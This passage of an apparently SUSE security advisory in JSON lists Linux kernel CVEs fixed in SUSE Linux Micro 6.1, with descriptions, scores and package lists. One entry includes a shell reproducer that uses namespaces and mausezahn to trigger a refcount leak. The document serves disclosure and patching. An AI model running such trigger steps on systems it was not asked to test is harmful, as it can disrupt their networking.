"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68238"
},
{
"cve": "CVE-2025-68239",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68239"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbinfmt_misc: restore write access before closing files opened by open_exec()\n\nbm_register_write() opens an executable file using open_exec(), which\ninternally calls do_open_execat() and denies write access on the file to\navoid modification while it is being executed.\n\nHowever, when an error occurs, bm_register_write() closes the file using\nfilp_close() directly. This does not restore the write permission, which\nmay cause subsequent write operations on the same file to fail.\n\nFix this by calling exe_file_allow_write_access() before filp_close() to\nrestore the write permission properly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68239",
"url": "https://www.suse.com/security/cve/CVE-2025-68239"
},
{
"category": "external",
"summary": "SUSE Bug 1255272 for CVE-2025-68239",
"url": "https://bugzilla.suse.com/1255272"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68239"
},
{
"cve": "CVE-2025-68241",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68241"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe\n\nThe sit driver\u0027s packet transmission path calls: sit_tunnel_xmit() -\u003e\nupdate_or_create_fnhe(), which lead to fnhe_remove_oldest() being called\nto delete entries exceeding FNHE_RECLAIM_DEPTH+random.\n\nThe race window is between fnhe_remove_oldest() selecting fnheX for\ndeletion and the subsequent kfree_rcu(). During this time, the\nconcurrent path\u0027s __mkroute_output() -\u003e find_exception() can fetch the\nsoon-to-be-deleted fnheX, and rt_bind_exception() then binds it with a\nnew dst using a dst_hold(). When the original fnheX is freed via RCU,\nthe dst reference remains permanently leaked.\n\nCPU 0 CPU 1\n__mkroute_output()\n find_exception() [fnheX]\n update_or_create_fnhe()\n fnhe_remove_oldest() [fnheX]\n rt_bind_exception() [bind dst]\n RCU callback [fnheX freed, dst leak]\n\nThis issue manifests as a device reference count leak and a warning in\ndmesg when unregistering the net device:\n\n unregister_netdevice: waiting for sitX to become free. Usage count = N\n\nIdo Schimmel provided the simple test validation method [1].\n\nThe fix clears \u0027oldest-\u003efnhe_daddr\u0027 before calling fnhe_flush_routes().\nSince rt_bind_exception() checks this field, setting it to zero prevents\nthe stale fnhe from being reused and bound to a new dst just before it\nis freed.\n\n[1]\nip netns add ns1\nip -n ns1 link set dev lo up\nip -n ns1 address add 192.0.2.1/32 dev lo\nip -n ns1 link add name dummy1 up type dummy\nip -n ns1 route add 192.0.2.2/32 dev dummy1\nip -n ns1 link add name gretap1 up arp off type gretap \\\n local 192.0.2.1 remote 192.0.2.2\nip -n ns1 route add 198.51.0.0/16 dev gretap1\ntaskset -c 0 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\ntaskset -c 2 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\nsleep 10\nip netns pids ns1 | xargs kill\nip netns del ns1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68241",
"url": "https://www.suse.com/security/cve/CVE-2025-68241"
},
{
"category": "external",
"summary": "SUSE Bug 1255157 for CVE-2025-68241",
"url": "https://bugzilla.suse.com/1255157"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68241"
},
{
"cve": "CVE-2025-68244",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68244"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915: Avoid lock inversion when pinning to GGTT on CHV/BXT+VTD\n\nOn completion of i915_vma_pin_ww(), a synchronous variant of\ndma_fence_work_commit() is called. When pinning a VMA to GGTT address\nspace on a Cherry View family processor, or on a Broxton generation SoC\nwith VTD enabled, i.e., when stop_machine() is then called from\nintel_ggtt_bind_vma(), that can potentially lead to lock inversion among\nreservation_ww and cpu_hotplug locks.\n\n[86.861179] ======================================================\n[86.861193] WARNING: possible circular locking dependency detected\n[86.861209] 6.15.0-rc5-CI_DRM_16515-gca0305cadc2d+ #1 Tainted: G U\n[86.861226] ------------------------------------------------------\n[86.861238] i915_module_loa/1432 is trying to acquire lock:\n[86.861252] ffffffff83489090 (cpu_hotplug_lock){++++}-{0:0}, at: stop_machine+0x1c/0x50\n[86.861290]\nbut task is already holding lock:\n[86.861303] ffffc90002e0b4c8 (reservation_ww_class_mutex){+.+.}-{3:3}, at: i915_vma_pin.constprop.0+0x39/0x1d0 [i915]\n[86.862233]\nwhich lock already depends on the new lock.\n[86.862251]\nthe existing dependency chain (in reverse order) is:\n[86.862265]\n-\u003e #5 (reservation_ww_class_mutex){+.+.}-{3:3}:\n[86.862292] dma_resv_lockdep+0x19a/0x390\n[86.862315] do_one_initcall+0x60/0x3f0\n[86.862334] kernel_init_freeable+0x3cd/0x680\n[86.862353] kernel_init+0x1b/0x200\n[86.862369] ret_from_fork+0x47/0x70\n[86.862383] ret_from_fork_asm+0x1a/0x30\n[86.862399]\n-\u003e #4 (reservation_ww_class_acquire){+.+.}-{0:0}:\n[86.862425] dma_resv_lockdep+0x178/0x390\n[86.862440] do_one_initcall+0x60/0x3f0\n[86.862454] kernel_init_freeable+0x3cd/0x680\n[86.862470] kernel_init+0x1b/0x200\n[86.862482] ret_from_fork+0x47/0x70\n[86.862495] ret_from_fork_asm+0x1a/0x30\n[86.862509]\n-\u003e #3 (\u0026mm-\u003emmap_lock){++++}-{3:3}:\n[86.862531] down_read_killable+0x46/0x1e0\n[86.862546] lock_mm_and_find_vma+0xa2/0x280\n[86.862561] do_user_addr_fault+0x266/0x8e0\n[86.862578] exc_page_fault+0x8a/0x2f0\n[86.862593] asm_exc_page_fault+0x27/0x30\n[86.862607] filldir64+0xeb/0x180\n[86.862620] kernfs_fop_readdir+0x118/0x480\n[86.862635] iterate_dir+0xcf/0x2b0\n[86.862648] __x64_sys_getdents64+0x84/0x140\n[86.862661] x64_sys_call+0x1058/0x2660\n[86.862675] do_syscall_64+0x91/0xe90\n[86.862689] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[86.862703]\n-\u003e #2 (\u0026root-\u003ekernfs_rwsem){++++}-{3:3}:\n[86.862725] down_write+0x3e/0xf0\n[86.862738] kernfs_add_one+0x30/0x3c0\n[86.862751] kernfs_create_dir_ns+0x53/0xb0\n[86.862765] internal_create_group+0x134/0x4c0\n[86.862779] sysfs_create_group+0x13/0x20\n[86.862792] topology_add_dev+0x1d/0x30\n[86.862806] cpuhp_invoke_callback+0x4b5/0x850\n[86.862822] cpuhp_issue_call+0xbf/0x1f0\n[86.862836] __cpuhp_setup_state_cpuslocked+0x111/0x320\n[86.862852] __cpuhp_setup_state+0xb0/0x220\n[86.862866] topology_sysfs_init+0x30/0x50\n[86.862879] do_one_initcall+0x60/0x3f0\n[86.862893] kernel_init_freeable+0x3cd/0x680\n[86.862908] kernel_init+0x1b/0x200\n[86.862921] ret_from_fork+0x47/0x70\n[86.862934] ret_from_fork_asm+0x1a/0x30\n[86.862947]\n-\u003e #1 (cpuhp_state_mutex){+.+.}-{3:3}:\n[86.862969] __mutex_lock+0xaa/0xed0\n[86.862982] mutex_lock_nested+0x1b/0x30\n[86.862995] __cpuhp_setup_state_cpuslocked+0x67/0x320\n[86.863012] __cpuhp_setup_state+0xb0/0x220\n[86.863026] page_alloc_init_cpuhp+0x2d/0x60\n[86.863041] mm_core_init+0x22/0x2d0\n[86.863054] start_kernel+0x576/0xbd0\n[86.863068] x86_64_start_reservations+0x18/0x30\n[86.863084] x86_64_start_kernel+0xbf/0x110\n[86.863098] common_startup_64+0x13e/0x141\n[86.863114]\n-\u003e #0 (cpu_hotplug_lock){++++}-{0:0}:\n[86.863135] __lock_acquire+0x16\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68244",
"url": "https://www.suse.com/security/cve/CVE-2025-68244"
},
{
"category": "external",
"summary": "SUSE Bug 1255190 for CVE-2025-68244",
"url": "https://bugzilla.suse.com/1255190"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68244"
},
{
"cve": "CVE-2025-68245",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68245"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: netpoll: fix incorrect refcount handling causing incorrect cleanup\n\ncommit efa95b01da18 (\"netpoll: fix use after free\") incorrectly\nignored the refcount and prematurely set dev-\u003enpinfo to NULL during\nnetpoll cleanup, leading to improper behavior and memory leaks.\n\nScenario causing lack of proper cleanup:\n\n1) A netpoll is associated with a NIC (e.g., eth0) and netdev-\u003enpinfo is\n allocated, and refcnt = 1\n - Keep in mind that npinfo is shared among all netpoll instances. In\n this case, there is just one.\n\n2) Another netpoll is also associated with the same NIC and\n npinfo-\u003erefcnt += 1.\n - Now dev-\u003enpinfo-\u003erefcnt = 2;\n - There is just one npinfo associated to the netdev.\n\n3) When the first netpolls goes to clean up:\n - The first cleanup succeeds and clears np-\u003edev-\u003enpinfo, ignoring\n refcnt.\n - It basically calls `RCU_INIT_POINTER(np-\u003edev-\u003enpinfo, NULL);`\n - Set dev-\u003enpinfo = NULL, without proper cleanup\n - No -\u003endo_netpoll_cleanup() is either called\n\n4) Now the second target tries to clean up\n - The second cleanup fails because np-\u003edev-\u003enpinfo is already NULL.\n * In this case, ops-\u003endo_netpoll_cleanup() was never called, and\n the skb pool is not cleaned as well (for the second netpoll\n instance)\n - This leaks npinfo and skbpool skbs, which is clearly reported by\n kmemleak.\n\nRevert commit efa95b01da18 (\"netpoll: fix use after free\") and adds\nclarifying comments emphasizing that npinfo cleanup should only happen\nonce the refcount reaches zero, ensuring stable and correct netpoll\nbehavior.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68245",
"url": "https://www.suse.com/security/cve/CVE-2025-68245"
},
{
"category": "external",
"summary": "SUSE Bug 1255268 for CVE-2025-68245",
"url": "https://bugzilla.suse.com/1255268"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
